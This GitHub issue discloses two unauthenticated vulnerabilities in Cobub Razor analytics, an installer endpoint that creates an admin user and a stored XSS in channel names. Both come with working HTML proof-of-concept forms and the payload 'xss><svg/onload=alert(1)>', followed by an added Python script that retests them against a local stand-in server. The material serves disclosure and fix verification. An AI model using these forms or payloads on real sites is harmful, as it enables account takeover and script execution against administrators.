cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution

Home Page: http://www.cobub.com


Some vulnerability

ppb2018 opened this issue · comments

1. Create user without login

Just open the URL without logging in, and the test user will be created.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http&#58;&#47;&#47;127&#46;0&#46;0&#46;1&#47;" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2. Add data without login and execute evil code.

Change the channel_id, then open the HTML page, even without logging in. When the admin accesses /index.php?/manage/channel, the evil code will execute.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel&#95;id" value="979" />
      <input type="hidden" name="channel&#95;name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
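The following is an added retest script, not part of this issue or of the Cobub Razor code base. It replays both PoCs above as unauthenticated POSTs (no session cookie), records whether the server accepts them, then reads /index.php?/manage/channel as the admin and checks whether the channel_name payload comes back unescaped. To stay runnable offline it targets a constructed stand-in server that reproduces the reported behaviour in `fixed=False` mode and the expected remediation (install lock, login required on modifychannel and the channel page, HTML-escaped output) in `fixed=True` mode; the cookie name `razor_session`, the lock and redirect behaviour, and the stand-in's response bodies are assumptions, only the paths and form fields come from the PoCs. Point `retest()` at a real base URL to use it against a deployment.

```python
import html
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Paths and field values below are taken from the two PoCs in the issue.
CREATE_USER = "/index.php?/install/installation/createuserinfo"
MODIFY_CHANNEL = "/index.php?/manage/channel/modifychannel"
CHANNEL_PAGE = "/index.php?/manage/channel"
XSS_PAYLOAD = "xss><svg/onload=alert(1)>"
ADMIN_COOKIE = "razor_session=admin"  # assumed cookie of the stand-in, not the real app's


class StandIn(BaseHTTPRequestHandler):
    """Constructed stand-in for the three endpoints (not razor's code).
    fixed=False: behaves as the issue describes. fixed=True: installer locked,
    session required for modifychannel and the channel page, output escaped."""
    fixed = False
    channels = {}

    def log_message(self, *args):  # keep the console quiet
        pass

    def _logged_in(self):
        return ADMIN_COOKIE in self.headers.get("Cookie", "")

    def _reply(self, code, body="", location=None):
        self.send_response(code)
        if location:
            self.send_header("Location", location)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(body.encode())

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = dict(urllib.parse.parse_qsl(self.rfile.read(length).decode()))
        if self.path == CREATE_USER:
            if self.fixed:  # install lock: refused even for a logged-in admin
                return self._reply(403, "installer locked")
            return self._reply(200, "user %s created" % form.get("superuser"))
        if self.path == MODIFY_CHANNEL:
            if self.fixed and not self._logged_in():
                return self._reply(302, location="/index.php?/login")
            self.channels[form.get("channel_id")] = form.get("channel_name", "")
            return self._reply(200, "ok")
        self._reply(404)

    def do_GET(self):
        if self.path != CHANNEL_PAGE:
            return self._reply(404)
        if self.fixed and not self._logged_in():
            return self._reply(302, location="/index.php?/login")
        render = html.escape if self.fixed else (lambda s: s)  # the stored-XSS sink
        rows = "".join("<tr><td>%s</td></tr>" % render(n) for n in self.channels.values())
        self._reply(200, "<table>%s</table>" % rows)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 3xx responses as results instead of following them."""
    def redirect_request(self, *args, **kwargs):
        return None


def _request(base, path, fields=None, cookie=None):
    """GET when fields is None, form POST otherwise; returns (status, body)."""
    data = urllib.parse.urlencode(fields).encode() if fields is not None else None
    req = urllib.request.Request(base + path, data=data)
    if cookie:
        req.add_header("Cookie", cookie)
    try:
        with urllib.request.build_opener(_NoRedirect).open(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def retest(base):
    """Replay the PoCs without a session. True means the finding still holds."""
    status, _ = _request(base, CREATE_USER, {
        "siteurl": base + "/", "superuser": "test", "pwd": "test123",
        "verifypassword": "test123", "email": "12@qq.com"})
    create_open = status == 200
    channel = {"channel_id": "979", "channel_name": XSS_PAYLOAD, "platform": "1"}
    status, _ = _request(base, MODIFY_CHANNEL, channel)
    modify_open = status == 200
    # Store the payload as the admin as well, so the rendering check stays
    # meaningful when the unauthenticated write is refused.
    _request(base, MODIFY_CHANNEL, channel, cookie=ADMIN_COOKIE)
    _, page = _request(base, CHANNEL_PAGE, cookie=ADMIN_COOKIE)
    return {
        "createuserinfo_without_login": create_open,
        "modifychannel_without_login": modify_open,
        "channel_name_rendered_unescaped": XSS_PAYLOAD in page,
    }


def start_standin(fixed):
    """Serve the stand-in on a free localhost port; returns (server, base_url)."""
    StandIn.fixed, StandIn.channels = fixed, {}
    srv = HTTPServer(("127.0.0.1", 0), StandIn)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    for mode in (False, True):
        server, url = start_standin(mode)
        print("fixed=%s" % mode, retest(url))
        server.shutdown()
```

Redirects are deliberately not followed: a 302 to the login page is the "fixed" signal for the second finding, and following it would turn that into a misleading 200. Note that an install lock is the right fix for the first finding rather than a login check, since the installer is meant to run before any account exists.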